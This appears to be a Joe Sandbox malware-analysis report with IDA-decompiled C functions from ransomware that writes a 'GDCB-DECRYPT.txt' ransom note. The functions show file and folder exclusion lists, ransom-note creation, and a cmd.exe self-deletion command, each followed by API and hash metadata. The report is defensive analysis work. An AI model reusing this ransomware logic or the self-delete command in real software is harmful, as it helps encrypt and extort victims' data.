                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                      • String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$t$t${USERID}
                                      • API String ID: 4033391921-198931148
                                      • Opcode ID: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
                                      • Instruction ID: b72f1aa0908df0bbc044f05aee074301ccc00ff49c2eba455c4c048f303cf63e
                                      • Opcode Fuzzy Hash: 6847579bacb329ad28de8d3bfebd4ba97bf46600428eaa1bedf2c707f040ed1e
                                      • Instruction Fuzzy Hash: C241D2B02043008BD7209F11995836BBAF1FFC5788F40892DFA85AB291D7B99955CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00406240(WCHAR* __ecx) {
                                      				int _t4;
                                      				signed int _t5;
                                      				signed int _t15;
                                      				void* _t19;
                                      				WCHAR* _t21;
                                      				short* _t25;
                                      				WCHAR* _t26;
                                      
                                      				_t21 = __ecx;
                                      				_t4 = lstrlenW(__ecx);
                                      				_t5 = lstrlenW(_t21);
                                      				_t1 = _t21 - 2; // -2
                                      				_t25 = _t1 + _t5 * 2;
                                      				_t19 = _t4 - 1;
                                      				if(_t19 != 0) {
                                      					do {
                                      						_t25 = _t25 - 2;
                                      						_t19 = _t19 - 1;
                                      					} while ( *_t25 != 0x5c && _t19 != 0);
                                      				}
                                      				_t26 = _t25 + 2;
                                      				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                      					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                      						goto L5;
                                      					} else {
                                      						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
                                      						asm("sbb eax, eax");
                                      						return  ~_t15 + 1;
                                      					}
                                      				} else {
                                      					L5:
                                      					return 1;
                                      				}
                                      			}










                                      0x00406249
                                      0x0040624c
                                      0x00406251
                                      0x00406253
                                      0x00406256
                                      0x00406259
                                      0x0040625a
                                      0x00406260
                                      0x00406260
                                      0x00406263
                                      0x00406264
                                      0x00406260
                                      0x00406274
                                      0x00406281
                                      0x00406296
                                      0x00000000
                                      0x004062e0
                                      0x004062e6
                                      0x004062eb
                                      0x004062f0
                                      0x004062f0
                                      0x00406285
                                      0x00406285
                                      0x0040628b
                                      0x0040628b

                                      APIs
                                      • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00406403), ref: 0040624C
                                      • lstrlenW.KERNEL32(00000000), ref: 00406251
                                      • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0040627D
                                      • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00406292
                                      • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0040629E
                                      • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 004062AA
                                      • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 004062B6
                                      • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 004062C2
                                      • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 004062CE
                                      • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 004062DA
                                      • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 004062E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi$lstrlen
                                      • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                      • API String ID: 203586893-634406045
                                      • Opcode ID: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
                                      • Instruction ID: 048d6f8e0bde4782f578bbb55f50fa0ba415c8db6f5f272e4d17ab509b81b6c5
                                      • Opcode Fuzzy Hash: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
                                      • Instruction Fuzzy Hash: 3D11546264262A2ADA6072799C05EEB129C4D91F5031603BBFC05F21C4DFFDDEA285BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 15%
                                      			E00406110(void* __ecx) {
                                      				void* _t9;
                                      				intOrPtr* _t20;
                                      				void* _t42;
                                      				void* _t45;
                                      
                                      				_t42 = __ecx;
                                      				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
                                      				if(E00407BA0(_t42, L"\\ProgramData\\") != 0 || E00407BA0(_t42, L"\\Program Files\\") != 0 || E00407BA0(_t42, L"\\Tor Browser\\") != 0 || E00407BA0(_t42, L"Ransomware") != 0 || E00407BA0(_t42, L"\\All Users\\") != 0) {
                                      					L15:
                                      					VirtualFree(_t45, 0, 0x8000);
                                      					return 0;
                                      				} else {
                                      					_t9 = E00407BA0(_t42, L"\\Local Settings\\");
                                      					if(_t9 != 0) {
                                      						goto L15;
                                      					} else {
                                      						_t20 = __imp__SHGetSpecialFolderPathW;
                                      						_push(_t9);
                                      						_push(0x2a);
                                      						_push(_t45);
                                      						_push(_t9);
                                      						if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      							_push(0);
                                      							_push(0x2b);
                                      							_push(_t45);
                                      							_push(0);
                                      							if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      								_push(0);
                                      								_push(0x24);
                                      								_push(_t45);
                                      								_push(0);
                                      								if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      									_push(0);
                                      									_push(0x1c);
                                      									_push(_t45);
                                      									_push(0);
                                      									if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
                                      										VirtualFree(_t45, 0, 0x8000);
                                      										return 1;
                                      									} else {
                                      										goto L15;
                                      									}
                                      								} else {
                                      									goto L15;
                                      								}
                                      							} else {
                                      								goto L15;
                                      							}
                                      						} else {
                                      							goto L15;
                                      						}
                                      					}
                                      				}
                                      			}







                                      0x00406121
                                      0x00406130
                                      0x00406139
                                      0x00406228
                                      0x00406231
                                      0x0040623c
                                      0x0040618f
                                      0x00406196
                                      0x0040619d
                                      0x00000000
                                      0x004061a3
                                      0x004061a3
                                      0x004061a9
                                      0x004061aa
                                      0x004061ac
                                      0x004061ad
                                      0x004061b2
                                      0x004061c1
                                      0x004061c3
                                      0x004061c5
                                      0x004061c6
                                      0x004061cc
                                      0x004061db
                                      0x004061dd
                                      0x004061df
                                      0x004061e0
                                      0x004061e6
                                      0x004061f5
                                      0x004061f7
                                      0x004061f9
                                      0x004061fa
                                      0x00406200
                                      0x0040621c
                                      0x00406227
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004061b2
                                      0x0040619d

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
                                      • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 00406231
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                      • String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                      • API String ID: 1363212851-106008693
                                      • Opcode ID: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
                                      • Instruction ID: f4f5e37f6e05bfd3754b73729b88660f17dd9cd9e6b304112d3c6a2927df81c1
                                      • Opcode Fuzzy Hash: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
                                      • Instruction Fuzzy Hash: F4213D3078021233EA2031662D6AB7F299E8BD5749F55447BBA02FA3C5FEBCEC15425D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00406BA0(intOrPtr* __ecx) {
                                      				int _t42;
                                      				int _t48;
                                      				int _t51;
                                      				int _t54;
                                      				int _t57;
                                      				int _t60;
                                      				int _t63;
                                      				int _t66;
                                      				int _t70;
                                      				int _t72;
                                      				void* _t75;
                                      				intOrPtr* _t86;
                                      				int _t88;
                                      				int _t89;
                                      				int _t90;
                                      				int _t91;
                                      				int _t92;
                                      				int _t93;
                                      				int _t94;
                                      				void* _t95;
                                      
                                      				_t40 = lstrlenW;
                                      				_t86 = __ecx;
                                      				_t75 = 0;
                                      				if( *__ecx != 0) {
                                      					_t72 = lstrlenW( *(__ecx + 8));
                                      					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                      					_t40 = lstrlenW;
                                      					_t75 = _t3 + _t72;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                      					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                      					_t70 = lstrlenW( *(_t86 + 0x10));
                                      					_t7 = _t95 + 4; // 0x4
                                      					_t75 = _t7 + _t70 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                      					_t94 = lstrlenW( *(_t86 + 0x20));
                                      					_t66 = lstrlenW( *(_t86 + 0x1c));
                                      					_t11 = _t94 + 4; // 0x4
                                      					_t75 = _t11 + _t66 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                      					_t93 = lstrlenW( *(_t86 + 0x2c));
                                      					_t63 = lstrlenW( *(_t86 + 0x28));
                                      					_t15 = _t93 + 4; // 0x4
                                      					_t75 = _t15 + _t63 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                      					_t92 = lstrlenW( *(_t86 + 0x38));
                                      					_t60 = lstrlenW( *(_t86 + 0x34));
                                      					_t19 = _t92 + 4; // 0x4
                                      					_t75 = _t19 + _t60 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                      					_t91 = lstrlenW( *(_t86 + 0x44));
                                      					_t57 = lstrlenW( *(_t86 + 0x40));
                                      					_t23 = _t91 + 4; // 0x4
                                      					_t75 = _t23 + _t57 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                      					_t90 = lstrlenW( *(_t86 + 0x50));
                                      					_t54 = lstrlenW( *(_t86 + 0x4c));
                                      					_t27 = _t90 + 4; // 0x4
                                      					_t75 = _t27 + _t54 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                      					_t89 = lstrlenW( *(_t86 + 0x5c));
                                      					_t51 = lstrlenW( *(_t86 + 0x58));
                                      					_t31 = _t89 + 4; // 0x4
                                      					_t75 = _t31 + _t51 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                      					_t75 = _t75 + 0x14;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                      					_t88 = lstrlenW( *(_t86 + 0x7c));
                                      					_t48 = lstrlenW( *(_t86 + 0x78));
                                      					_t36 = _t88 + 4; // 0x4
                                      					_t75 = _t36 + _t48 + _t75;
                                      				}
                                      				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                      					return _t75;
                                      				} else {
                                      					_t42 = lstrlenW( *(_t86 + 0x88));
                                      					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                      				}
                                      			}























                                      0x00406ba0
                                      0x00406ba8
                                      0x00406baa
                                      0x00406bae
                                      0x00406bb3
                                      0x00406bc1
                                      0x00406bc4
                                      0x00406bc9
                                      0x00406bc9
                                      0x00406bcf
                                      0x00406bd9
                                      0x00406be0
                                      0x00406be4
                                      0x00406be7
                                      0x00406be7
                                      0x00406bed
                                      0x00406bfb
                                      0x00406bfd
                                      0x00406c05
                                      0x00406c08
                                      0x00406c08
                                      0x00406c0e
                                      0x00406c1c
                                      0x00406c1e
                                      0x00406c26
                                      0x00406c29
                                      0x00406c29
                                      0x00406c2f
                                      0x00406c3d
                                      0x00406c3f
                                      0x00406c47
                                      0x00406c4a
                                      0x00406c4a
                                      0x00406c50
                                      0x00406c5e
                                      0x00406c60
                                      0x00406c68
                                      0x00406c6b
                                      0x00406c6b
                                      0x00406c71
                                      0x00406c7f
                                      0x00406c81
                                      0x00406c89
                                      0x00406c8c
                                      0x00406c8c
                                      0x00406c92
                                      0x00406ca0
                                      0x00406ca2
                                      0x00406caa
                                      0x00406cad
                                      0x00406cad
                                      0x00406cb3
                                      0x00406cb5
                                      0x00406cb5
                                      0x00406cbc
                                      0x00406cca
                                      0x00406ccc
                                      0x00406cd4
                                      0x00406cd7
                                      0x00406cd7
                                      0x00406ce0
                                      0x00406d0c
                                      0x00406ce2
                                      0x00406ce8
                                      0x00406d06
                                      0x00406d06

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
                                      • lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CE8
                                      • lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CF6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID:
                                      • API String ID: 1659193697-0
                                      • Opcode ID: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
                                      • Instruction ID: 0763c41813d47cec7f7f3bb87dd63c09dcdfaa37f7dde6f7b674e60aab311cac
                                      • Opcode Fuzzy Hash: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
                                      • Instruction Fuzzy Hash: BA412B32200611EFD7125FB8DE8C796BBB2FF04315F094539E416A2A62D775AC78DB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405270(WCHAR* __ecx) {
                                      				CHAR* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				void* _t22;
                                      				void* _t24;
                                      				signed int _t26;
                                      				int _t30;
                                      				char _t32;
                                      				void* _t33;
                                      				signed char _t34;
                                      				CHAR* _t36;
                                      				WCHAR* _t37;
                                      				WCHAR* _t38;
                                      				void* _t39;
                                      				CHAR* _t40;
                                      
                                      				_t37 = __ecx;
                                      				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                      				_v20 = _t39;
                                      				GetModuleFileNameW(0, _t39, 0x200);
                                      				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
                                      				_v16 = _t33;
                                      				if(_t33 != 0xffffffff) {
                                      					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
                                      					_v24 = _t22;
                                      					if(_t22 != 0) {
                                      						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
                                      						_v12 = _t24;
                                      						if(_t24 != 0) {
                                      							_t5 = _t24 + 0x4e; // 0x4e
                                      							_t40 = _t5;
                                      							_v8 = _t40;
                                      							_t26 = lstrlenW(_t37);
                                      							_t34 = 0;
                                      							_t38 =  &(_t37[_t26]);
                                      							if(lstrlenA(_t40) + _t27 != 0) {
                                      								_t36 = _t40;
                                      								do {
                                      									if((_t34 & 0x00000001) != 0) {
                                      										 *((char*)(_t38 + _t34)) = 0;
                                      									} else {
                                      										_t32 =  *_t40;
                                      										_t40 =  &(_t40[1]);
                                      										 *((char*)(_t38 + _t34)) = _t32;
                                      									}
                                      									_t34 = _t34 + 1;
                                      									_t30 = lstrlenA(_t36);
                                      									_t36 = _v8;
                                      								} while (_t34 < _t30 + _t30);
                                      							}
                                      							UnmapViewOfFile(_v12);
                                      							_t33 = _v16;
                                      							_t39 = _v20;
                                      						}
                                      						CloseHandle(_v24);
                                      					}
                                      					CloseHandle(_t33);
                                      				}
                                      				return VirtualFree(_t39, 0, 0x8000);
                                      			}




















                                      0x00405287
                                      0x0040528f
                                      0x00405299
                                      0x0040529c
                                      0x004052bb
                                      0x004052bd
                                      0x004052c3
                                      0x004052d4
                                      0x004052da
                                      0x004052df
                                      0x004052ea
                                      0x004052f0
                                      0x004052f5
                                      0x004052f7
                                      0x004052f7
                                      0x004052fb
                                      0x004052fe
                                      0x00405305
                                      0x00405307
                                      0x00405312
                                      0x00405314
                                      0x00405316
                                      0x00405319
                                      0x00405323
                                      0x0040531b
                                      0x0040531b
                                      0x0040531d
                                      0x0040531e
                                      0x0040531e
                                      0x00405328
                                      0x00405329
                                      0x0040532f
                                      0x00405334
                                      0x00405316
                                      0x0040533b
                                      0x00405341
                                      0x00405344
                                      0x00405344
                                      0x0040534a
                                      0x0040534a
                                      0x00405351
                                      0x00405351
                                      0x0040536b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,00405482), ref: 00405289
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00405482), ref: 0040529C
                                      • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00405482), ref: 004052B5
                                      • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052D4
                                      • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052EA
                                      • lstrlenW.KERNEL32(?,?,?,?,?,00405482), ref: 004052FE
                                      • lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 0040530A
                                      • lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 00405329
                                      • UnmapViewOfFile.KERNEL32(?,?,?,?,?,00405482), ref: 0040533B
                                      • CloseHandle.KERNEL32(?,?,?,?,?,00405482), ref: 0040534A
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00405482), ref: 00405351
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00405482), ref: 0040535F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                      • String ID:
                                      • API String ID: 869890170-0
                                      • Opcode ID: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
                                      • Instruction ID: 2f98b26bd8e2ee7d85d2e29faddfdf40e9a873387be652c4beaa2a3b1dd5d715
                                      • Opcode Fuzzy Hash: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
                                      • Instruction Fuzzy Hash: 4231A531740715BBEB205B649D4EF5E7B68EB05B40F200075FB41BA2D2C6F5A9018FAC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00406640(void* __ecx) {
                                      				long _v8;
                                      				WCHAR* _t7;
                                      				signed int _t16;
                                      				void* _t21;
                                      				void* _t22;
                                      				void* _t25;
                                      
                                      				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                      				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
                                      				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                      				if(_t22 != 0xffffffff) {
                                      					_t7 =  *0x412b04; // 0x412000
                                      					if(_t7 != 0) {
                                      						WriteFile(_t22,  *0x412b04, lstrlenW(_t7) + _t11,  &_v8, 0);
                                      					}
                                      					CloseHandle(_t22);
                                      					_t16 = 1;
                                      				} else {
                                      					_t16 = 0 | GetLastError() == 0x000000b7;
                                      				}
                                      				VirtualFree(_t25, 0, 0x8000);
                                      				return _t16;
                                      			}









                                      0x0040665b
                                      0x00406663
                                      0x00406685
                                      0x0040668a
                                      0x0040669e
                                      0x004066a5
                                      0x004066be
                                      0x004066be
                                      0x004066c5
                                      0x004066cb
                                      0x0040668c
                                      0x00406699
                                      0x00406699
                                      0x004066d8
                                      0x004066e6

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
                                      • wsprintfW.USER32 ref: 00406663
                                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
                                      • GetLastError.KERNEL32(?,?), ref: 0040668C
                                      • lstrlenW.KERNEL32(00412000,?,00000000,?,?), ref: 004066AE
                                      • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 004066BE
                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 004066C5
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                      • String ID: %s\GDCB-DECRYPT.txt
                                      • API String ID: 2985722263-4054134092
                                      • Opcode ID: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
                                      • Instruction ID: 9b1f1ee7684b205ce34ce946b48542e85b02e5c2206a3fbb18e6830c08f85e02
                                      • Opcode Fuzzy Hash: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
                                      • Instruction Fuzzy Hash: 2D0171753802107BF7205B64AE4EFAA3A6CEB49B15F100135FB05F91E1DBF96C11866D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404FD0() {
                                      				WCHAR* _t6;
                                      				short* _t8;
                                      
                                      				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                      				if(_t6 != 0) {
                                      					GetModuleFileNameW(0, _t6, 0x200);
                                      					if(_t8 != 0) {
                                      						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                      						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                      					}
                                      				}
                                      				ExitProcess(0);
                                      			}





                                      0x00404ff6
                                      0x00404ffa
                                      0x00404ffe
                                      0x00405008
                                      0x00405010
                                      0x00405019
                                      0x00405033
                                      0x00405033
                                      0x00405010
                                      0x0040503b

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
                                      • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
                                      • wsprintfW.USER32 ref: 00405019
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
                                      • ExitProcess.KERNEL32 ref: 0040503B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
